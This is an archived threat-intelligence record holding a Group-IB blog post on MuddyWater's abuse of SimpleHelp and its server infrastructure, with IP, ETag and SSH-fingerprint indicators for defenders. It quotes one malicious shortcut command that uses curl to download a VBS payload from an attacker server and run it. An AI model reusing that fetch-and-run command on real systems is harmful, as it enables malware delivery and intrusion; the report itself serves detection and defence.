{
	"id": "bd534e82-ef4e-43b7-9588-42516f0f9946",
	"created_at": "2026-04-06T00:18:14.474769Z",
	"updated_at": "2026-04-10T13:12:50.763741Z",
	"deleted_at": null,
	"sha1_hash": "ba530fe00299e206d2d60acc854d6e28aa03aae6",
	"title": "SimpleHarm tool: Tracking MuddyWater’s infrastructure | Group-IB Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 154995,
	"plain_text": "Nikita Rostovcev\r\nAPAC Technical Head - ASM, TI \u0026 DRP\r\nSimpleHarm: Tracking MuddyWater’s infrastructure\r\nGroup-IB analysts discovered the new MuddyWater infrastructure while researching the pro-state group’s use of the legitimate SimpleHelp tool.\r\nApril 18, 2023 · Threat Intelligence\r\nhttps://www.group-ib.com/blog/muddywater-infrastructure/\r\nPage 1 of 29\r\nAs a result of the ongoing military conflict, state-sponsored hackers have been more active, as we forecasted in the report Hi-Tech Crime Trends 2022/2023. Most attackers have engaged in cyber espionage against neighboring countries. One such group is MuddyWater, which Group-IB has written about before.\r\nAccording to publicly available research, MuddyWater is assessed to be a subordinate element within Iran’s Intelligence Ministry (MOIS). According to the US Congressional Research Service, the MOIS “conducts domestic surveillance to identify regime opponents”. Recent MuddyWater attacks targeted insurance, manufacturing and telecommunications companies in Israel and Egypt. As part of the attacks against Israeli organizations, the group exploited Log4j 2 vulnerabilities, according to Microsoft.\r\nIn the last few years, the group has been using legitimate remote control tools such as ScreenConnect, RemoteUtilities, and Syncro. By doing so, MuddyWater can connect to user devices at any moment and execute arbitrary commands, as well as download and upload files. It is difficult to track the activity of these tools because they are legitimate and not compromised, which is why they cannot be detected using traditional security tools. In the fall of 2022, using the Group-IB Threat Intelligence system, we discovered that MuddyWater used another similar tool, SimpleHelp. As we were conducting our analysis, our colleagues at ESET published a quarterly report in which they also mentioned that the group was using this tool.\r\nIn this blog post, we describe how the group uses SimpleHelp as well as previously unknown infrastructure, which we uncovered through our research. By continuously tracking the tactics, techniques, and procedures used by threat actors, Group-IB is able to proactively respond to malicious campaigns in the making and block new servers even when they are only being set up for attacks.\r\nThe aim of this blog post is to help information security specialists investigate incidents, understand MuddyWater’s network infrastructure in detail, and identify the group’s servers independently. This will help fine-tune security systems to proactively detect new activity by this threat actor.\r\nMuddyWater Profile\r\nPresumed origin: Iran.\r\nFirst active: 2017.\r\nTop five targeted industries: military, telecommunications, manufacturing, education, oil and gas.\r\nTop ten targeted countries: Turkey, Pakistan, UAE, Iraq, Israel, Saudi Arabia, Jordan, USA, Azerbaijan, Afghanistan.\r\nOther names: TEMP.Zagros, Seedworm, Static Kitten, SectorD02, TA450, Boggy Serpens, MERCURY.\r\nKey findings\r\nMuddyWater uses SimpleHelp, a legitimate remote device control and management tool, to ensure persistence on victim devices.\r\nSimpleHelp is not compromised and is used as intended. The threat actors found a way to download the tool from the official website and use it in their attacks.\r\nAccording to our data, MuddyWater used SimpleHelp for the first time on June 30, 2022. At the time of writing, the group has at least eight servers on which SimpleHelp is installed.\r\nThis blog post describes MuddyWater’s previously unknown infrastructure and points to links with some of the group’s publicly known IP addresses.\r\nThe group’s servers can be tracked by the ETag hashes they share:\r\n2aa6-5c939a3a79153\r\n2aa6-5b27e6e58988b\r\n2aa6-5c939a773f7a2\r\nSimpleHelp\r\nIn the fall of 2022, as part of a retrospective analysis of infrastructures used by threat actors, Group-IB’s Threat Intelligence platform detected the IP address 51.254.25[.]36, which has been connected with APT MuddyWater since at least February 2022. We later detected a file linked to this IP address; the file is called new aviation communications.exe (SHA1: 53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640).\r\nFigure 1: Graph analysis of infrastructure connected with 51.254.25[.]36. Source: Group-IB Threat Intelligence\r\nThe file “new aviation communications.exe” was uploaded to VirusTotal on June 30, 2022. It is a legitimate version of SimpleHelp with a valid digital signature. The file was compiled on June 18, 2021 at 13:45:41 UTC.\r\nFigure 2: Dates when the file with the SHA1 53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640 was compiled and uploaded to VirusTotal\r\nFigure 3: Digital signatures of the file with the SHA1 53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640\r\nWhen analyzing two IP addresses that Group-IB Threat Intelligence attributes to MuddyWater, we also discovered deployed SimpleHelp servers: 51[.]255[.]19[.]179 and 51[.]255[.]19[.]178.\r\nFigure 4: SimpleHelp servers 51[.]255[.]19[.]179 and 51[.]255[.]19[.]178\r\nSimpleHelp admin panel\r\nSimpleHelp by SimpleHelp Ltd (UK) is an administration panel for system administrators and tech support teams. It looks like this:\r\nFigure 5: SimpleHelp interface\r\nThe SimpleHelp client installed on victim devices can constantly run as a system service, which makes it possible to gain access to the user’s device at any point in time, even after a reboot.\r\nFigure 6: Remote access to a victim’s computer in SimpleHelp\r\nIn addition to connecting remotely, SimpleHelp operators can execute various commands on the victim’s device, including those that require administrator privileges:\r\nFigure 7: Remote command execution in SimpleHelp\r\nSimpleHelp operators can also use the command “Connect in Terminal Mode” to take control of the target device covertly.\r\nFigure 8: The command “Connect in Terminal Mode”\r\nIn this case, the shell is opened with system privileges:\r\nIn other words, the standard SimpleHelp functionality gives threat actors virtually unlimited possibilities to conduct attacks.\r\nWhat happens after SimpleHelp is installed?\r\nAt the time of writing, we do not know how exactly MuddyWater distributes the samples or what actions the group takes after gaining access through SimpleHelp. We can assume that the group sends out phishing emails containing links to file storage systems such as OneDrive or Onehub to download SimpleHelp installers. The group can also establish persistence on victim devices by using Fast Reverse Proxy (FRP) or Ligolo in order to extract information of interest and determine ways to move across the network.\r\nMuddyWater’s network infrastructure\r\nGroup-IB devotes considerable time to tracking the network infrastructure used by state-sponsored and other threat groups. As a result, we are able to proactively protect our customers and collect data about attacks that are either ongoing or in the making, even when we do not have access to malicious samples. The infrastructure that MuddyWater currently uses can be divided into two categories:\r\nPublicly known IP addresses used by the group\r\nNon-disclosed IP addresses that are highly likely used by the group, according to Group-IB’s assessments\r\nMuddyWater has been found to use its own unique set of components for deploying web servers on purchased virtual private servers (VPSs). We detected the following ETag hashes used by the group:\r\n2aa6-5c939a3a79153\r\n2aa6-5b27e6e58988b\r\n2aa6-5c939a773f7a2\r\nMuddyWater is known to have used some of the servers connected with these ETag hashes. Other servers have links to various malicious files or software used for attacks, including legitimate SimpleHelp installers.\r\nLet’s do a graph analysis\r\nLet’s start with the group’s publicly known IP addresses to illustrate the connection with the assistance of Group-IB’s proprietary Graph Network Analysis Tool. According to a Microsoft report, MuddyWater used the following IP addresses, where the abovementioned ETags were found:\r\n164[.]132[.]237[.]64\r\n91[.]121[.]240[.]104\r\nFigure 9: MuddyWater infrastructure as illustrated by the Group-IB Graph Network Analysis Tool. Source: Group-IB Threat Intelligence\r\n164[.]132[.]237[.]64\r\nThis host has multiple ETag hashes:\r\nFigure 10: Analysis of the host 164[.]132[.]237[.]64 and linked ETag hashes, illustrated by the Group-IB Graph Network Analysis tool. Source: Group-IB Threat Intelligence\r\nAnalysis of the infrastructure revealed a cross-over between the hosts 164[.]132[.]237[.]64 and 164[.]132[.]237[.]65 through the use of the same SSH fingerprint e7383c77c6f804cffac6c88651b7bce2.\r\nFigure 11: Additional example of MuddyWater infrastructure illustrated by the Group-IB Graph Network Analysis tool. Source: Group-IB Threat Intelligence\r\nOn the server 164[.]132[.]237[.]65, we found the framework Cobalt Strike with the following configuration file:\r\nFigure 12: Cobalt Strike configuration file\r\nIn November 2022, Group-IB’s Digital Forensics Lab and Threat Intelligence team responded to an incident in a network belonging to an organization in the Middle East. The operation revealed that the abovementioned IP address (164[.]132[.]237[.]65) had been used in the attack, while the tactics, techniques, and procedures (TTPs) we discovered fully matched those used by MuddyWater. What is interesting about this config is that it has a unique value in the field http-post.client and has no watermark field. This suggests that the threat actors use custom samples of the well-known tool Cobalt Strike, which can be tracked.\r\n91[.]121[.]240[.]104\r\nThis IP address is also mentioned in the Microsoft report and has the ETag 2aa6-5c939a3a79153:\r\nFigure 13: Analysis of the IP address 91[.]121[.]240[.]104, illustrated by the Group-IB Graph Network Analysis tool. Source: Group-IB Threat Intelligence\r\nSuspicious ETag hashes: MuddyWater’s previously unknown infrastructure\r\nThis part of the blog describes MuddyWater’s previously unknown infrastructure as well as some publicly known IP addresses used by the attackers.\r\nETag 2aa6-5c939a3a79153\r\nThe figure below shows that the three aforementioned IP addresses are linked through the HTTP ETag 2aa6-5c939a3a79153. Group-IB Threat Intelligence shows more than 50 servers linked to this ETag. The full list can be found in the network indicators table at the end of this blog post. This section lists what we deem the most noteworthy IP addresses connected with the ETag 2aa6-5c939a3a79153.\r\nFigure 14: Analysis of MuddyWater’s previously unknown infrastructure, illustrated by the Group-IB Graph Network Analysis tool. Source: Group-IB Threat Intelligence\r\n137[.]74[.]131[.]24\r\nDuring an incident response operation, Group-IB researchers found the above IP address in the network used by a Middle Eastern organization. Analysis of the victim’s infrastructure revealed the following traces of MuddyWater:\r\nFigure 15: Analysis of the host 137[.]74[.]131[.]24 and related ETags, illustrated by the Group-IB Graph Network Analysis tool. Source: Group-IB Threat Intelligence.\r\n91[.]121[.]240[.]96\r\nThe ETag 2aa6-5c939a3a79153 was located at the IP address 91[.]121[.]240[.]96 between October 25, 2021 and September 23, 2022.\r\nThis address is connected with a PowerShell script that was uploaded to VirusTotal via the web interface from Kazakhstan on July 19, 2022, i.e. when the ETag was on the server.\r\nFigure 16: PowerShell script uploaded to VirusTotal on July 19, 2022\r\nThe script is written in PowerShell. It is designed to receive commands from a remote server, execute them on the victim device, and send the results back to the server.\r\nFigure 17: Network communication of the PowerShell script with the command-and-control (C\u0026C) server 91[.]121[.]240[.]96\r\n91[.]121[.]240[.]108\r\nThe above is another IP address connected with the ETag 2aa6-5c939a3a79153. A shortcut file was found on VirusTotal, where it was uploaded on October 11, 2022.\r\nFigure 18: Metadata relating to the file with the SHA256 2528838a609aa143769efb37dff45af723868d4ed33eb1ce0e2d6ce64b2a1507\r\nThis file was distributed through an archive called request-for-service-no10102022.zip. The archive was uploaded to VirusTotal from Lithuania and Switzerland:\r\nFigure 19: Dates when the archive request-for-service-no10102022.zip was uploaded to VirusTotal\r\nShell command in the shortcut:\r\n/c curl -s http://91[.]121[.]240[.]108:443/HBIy \u003e C:\\programdata\\temp.vbs \u0026\u0026 START microso\r\nWhen the shortcut was executed, the command downloaded a payload from http://91[.]121[.]240[.]108:443/HBIy and saved it to the file C:\\programdata\\temp.vbs. As a distraction, the page hxxps://mohap[.]gov[.]ae is opened in Microsoft Edge with a dialog box informing the user that the file is corrupted. Unfortunately, at the time of the analysis the file HBIy was unavailable, which is why its contents could not be examined.\r\nIt is worth noting the path that was left in the shortcut when it was created: C:\\Users\\Pink Panter\\Documents\\PDF.ico. This suggests that the user who created the file has the username Pink Panter.\r\n178[.]32[.]30[.]3\r\nThe above IP address has already been used by MuddyWater in its attacks against Turkey and a number of countries in Asia. The attacks were described by Cisco Talos researchers. The address also has the ETag 2aa6-5c939a3a79153:\r\nFigure 20: Connections to the IP address 178[.]32[.]30[.]3, illustrated by the Group-IB Graph Network Analysis tool. Source: Group-IB Threat Intelligence\r\n149[.]202[.]242[.]80\r\nThe IP address 149[.]202[.]242[.]80 is also connected with another ETag, 2aa6-5b27e6e58988b. More information about it can be found below:\r\nFigure 21: Connections to the IP address 149[.]202[.]242[.]80, illustrated by the Group-IB Graph Network Analysis tool. Source: Group-IB Threat Intelligence\r\nETag 2aa6-5b27e6e58988b\r\nThe IP address 149[.]202[.]242[.]80 has multiple ETags. One of them is 2aa6-5b27e6e58988b. Five web servers are connected with this ETag. One of them is 164[.]132[.]237[.]66, which is part of the subnet 164[.]132[.]237[.]0/24 mentioned above.\r\nFigure 22: ETag 2aa6-5b27e6e58988b and related IP addresses, illustrated by the Group-IB Graph Network Analysis tool. Source: Group-IB Threat Intelligence.\r\nThis address is also linked to the ETag 2aa6-5c939a773f7a2, which we describe below.\r\nSSH fingerprint 3648a6085512ab91f5a23bafb8418f7b\r\nThis SSH fingerprint is linked to six IP addresses:\r\n51[.]255[.]19[.]183\r\n149[.]202[.]242[.]85\r\n149[.]202[.]242[.]80\r\n164[.]132[.]237[.]64\r\n164[.]132[.]237[.]66\r\n149[.]202[.]242[.]86\r\nThe SSH fingerprint is connected with the IP address 164[.]132[.]237[.]64 used by the group, which has already been mentioned above.\r\nFigure 23: Links to the SSH fingerprint as illustrated by the Group-IB Graph Network Analysis tool. Source: Group-IB Threat Intelligence.\r\nThe hosts 164[.]132[.]237[.]66 and 149[.]202[.]242[.]85, which are linked to the SSH fingerprint, share the abovementioned ETag 2aa6-5c939a773f7a2. Some of this ETag’s addresses also overlap with 2aa6-5c939a3a79153.\r\nETag 2aa6-5c939a773f7a2\r\n137[.]74[.]131[.]16 and 149[.]202[.]242[.]84\r\nMuddyWater has used these two addresses in the past, as described by Cisco Talos.\r\nFigure 24: Links to the ETag 2aa6-5c939a773f7a2 as illustrated by the Group-IB Graph Network Analysis tool.\r\nThis blog only mentions IP addresses that have linked files or a noteworthy history. Other IP addresses connected with specific ETags are listed in the table at the end of this article.\r\nConclusion\r\nWe believe it is important to share relevant hunting techniques, and we encourage cybersecurity researchers to publish their latest findings more often. Information security specialists can use the ETag hashes mentioned in this article to search for malicious servers using search engines such as Censys or Shodan. The table with network indicators lists the IP addresses of some servers where SimpleHelp is installed and which, according to Group-IB Threat Intelligence, belong to MuddyWater.\r\nAt the moment, we do not know for sure what vector MuddyWater uses for distributing SimpleHelp installers. It is likely, however, that the threat actors use phishing emails with links to cloud storage spaces such as OneDrive, Onehub, and Dropbox.\r\nRecommendations\r\n1. Use the network indicators provided in this blog post to track MuddyWater’s activity and proactively protect against the group’s attacks. By using search engines such as Shodan, you can search for malicious servers used by the threat actors and always be ready to proactively block such hosts. In addition, Shodan can be used to search for any new infrastructure used by the group.\r\n2. Use corporate email security tools to effectively prevent various threat groups from using corporate email as an attack vector. Thanks to unique threat intelligence data and patented technologies, Group-IB’s solution called Business Email Protection detects and blocks phishing, malicious attachments, and other BEC attacks with unprecedented precision, even if the threat actors use detection evasion techniques. Group-IB Business Email Protection also analyzes and attributes email-borne threats to proactively protect against such attacks and strengthen the organization’s overall security posture.\r\n3. For advanced cybersecurity teams, we recommend using Group-IB’s Threat Intelligence system, which, as we showed in this blog post, helped us detect MuddyWater’s use of SimpleHelp and expose its previously unknown infrastructure. Thanks to unique data sources, our Threat Intelligence system can be used to detect phishing and other relevant threats as early as during their preparation stage. The built-in graph analysis tool, enriched by data from the largest threat-actor database, reveals links between attackers, their infrastructures, and their tools. Enriching cybersecurity with threat intelligence helps significantly strengthen an organization’s ability to counter attacks, including ones carried out by state-sponsored groups.\r\nNetwork indicators\r\nTable columns: Hosts by ETag 2aa6-5c939a3a79153; Hosts by ETag 2aa6-5b27e6e58988b; Publicly confirmed MuddyWater IPs; Hosts by ETag 2aa6-5c939a773f7a2; MuddyWater SimpleHelp servers",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.group-ib.com/blog/muddywater-infrastructure/"
	],
	"report_names": [
		"muddywater-infrastructure"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434694,
	"ts_updated_at": 1775826770,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ba530fe00299e206d2d60acc854d6e28aa03aae6.pdf",
		"text": "https://archive.orkl.eu/ba530fe00299e206d2d60acc854d6e28aa03aae6.txt",
		"img": "https://archive.orkl.eu/ba530fe00299e206d2d60acc854d6e28aa03aae6.jpg"
	}
}